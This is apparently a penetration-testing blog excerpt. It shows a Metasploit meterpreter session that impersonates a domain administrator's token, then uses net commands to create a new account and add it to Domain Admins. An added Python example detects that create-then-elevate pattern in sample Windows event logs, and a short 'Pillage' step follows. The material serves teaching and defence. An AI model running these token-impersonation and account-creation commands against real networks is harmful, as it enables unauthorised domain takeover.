incognito - metasploit
http://www.bettertogether.org.au/blog/b/danielweis/archive/2011/12/08/path-of-least-resistance.aspx
meterpreter > load incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
MYDOM\adaministrator
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
Server username: MYDOM\adaministrator
meterpreter > shell
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\> whoami
mydom\adaministrator
C:\> net user timmedin /add /domain
The request will be processed at the primary domain controller for domain MYDOM.
The command completed successfully.
C:\> net group "Domain Admins" timmedin /add /domain
The request will be processed at the primary domain controller for domain MYDOM.
The command completed successfully.
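A defender's view of the two `net` commands above: this is an added example, not part of the original post, that scans constructed Windows Security log records for an account that is created (event 4720) and then added to a privileged group (4728 for global groups such as Domain Admins, 4732 for local groups) within a short window. The flat field names (`subject`, `target`, `group`) are a simplification of the real event schema, assumed here for readability.

```python
from datetime import datetime, timedelta

# Constructed sample events, not real log data. Times are UTC.
# 4624 = logon, 4720 = user account created, 4728 = member added to a
# security-enabled global group (Domain Admins is a global group).
SAMPLE_EVENTS = [
    {"time": "2011-12-08T10:00:00", "id": 4624, "subject": "MYDOM\\adaministrator", "target": "", "group": ""},
    {"time": "2011-12-08T10:01:10", "id": 4720, "subject": "MYDOM\\adaministrator", "target": "timmedin", "group": ""},
    {"time": "2011-12-08T10:01:42", "id": 4728, "subject": "MYDOM\\adaministrator", "target": "timmedin", "group": "Domain Admins"},
    {"time": "2011-12-08T11:30:00", "id": 4720, "subject": "MYDOM\\helpdesk", "target": "jdoe", "group": ""},
    {"time": "2011-12-09T09:00:00", "id": 4728, "subject": "MYDOM\\helpdesk", "target": "jdoe", "group": "Domain Users"},
]

# Groups whose membership changes should always be reviewed.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


def parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S")


def find_create_then_elevate(events, window=timedelta(hours=1)):
    """Return (account, actor, seconds_between) for every account that was
    created (4720) and then added to a privileged group (4728/4732)
    within `window`. Events may arrive out of order; they are sorted first."""
    created = {}  # account name (lower-cased) -> (creation time, creating actor)
    hits = []
    for ev in sorted(events, key=lambda e: parse_time(e["time"])):
        t = parse_time(ev["time"])
        if ev["id"] == 4720:
            created[ev["target"].lower()] = (t, ev["subject"])
        elif ev["id"] in (4728, 4732) and ev["group"] in PRIVILEGED_GROUPS:
            key = ev["target"].lower()
            if key in created and t - created[key][0] <= window:
                delta = int((t - created[key][0]).total_seconds())
                hits.append((ev["target"], ev["subject"], delta))
    return hits


if __name__ == "__main__":
    for account, actor, secs in find_create_then_elevate(SAMPLE_EVENTS):
        print(f"ALERT: {account} created and elevated by {actor} within {secs}s")
```

Only the `timmedin` sequence is flagged; `jdoe` is created but joins a non-privileged group, so it stays below the threshold.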
Step 7 – Pillage
Getting Domain Administrator level access is not the end; it is the beginning of a different portion of the test. Executives don't know what a Domain is, nor what a Domain Administrator is. Go find some cool information to demonstrate what is actually at risk. This step would take a book to describe fully, and it is often overlooked because some testers stop at Step 6, believing that is the end goal. The bad guys don't stop there, so why should we when acting as bad guys?